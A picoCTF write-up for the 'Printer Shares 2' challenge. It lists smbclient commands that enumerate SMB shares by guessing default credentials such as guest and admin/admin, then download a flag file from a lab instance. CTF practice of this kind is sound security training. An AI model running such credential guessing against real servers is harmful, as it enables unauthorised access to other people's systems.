picoCTF Solutions
picoCTF 2026General SkillsMedium

Printer Shares 2

Published: March 20, 2026

Description

A Secure Printer is now in use. I'm confident no one can leak the message again... or can you?

Setup

Launch the challenge instance and note the host and port.

This is a follow-up to Printer Shares -- the server is 'more secure' but still uses SMB.

sudo apt install smbclient

Solution

  1. Step 1List SMB shares with authentication
    The server now requires credentials. Try common default printer credentials (guest, anonymous, or admin/admin).
    smbclient -L //HOST -p PORT -U guest%
    smbclient -L //HOST -p PORT -U admin%admin
    smbclient -L //HOST -p PORT -U printer%printer
  2. Step 2Connect to the share
    Connect to the shares directory using the working credentials.
    smbclient //HOST/shares -p PORT -U guest%
  3. Step 3Navigate and download the flag
    The flag may be in a subdirectory or hidden share. List all directories and download the flag file.
    ls
    cd secure
    ls
    get flag.txt
    exit
    cat flag.txt

Flag

picoCTF{pr1nt3r_shar3s_2_...}

The second printer challenge requires authentication -- default printer credentials grant access to the flag.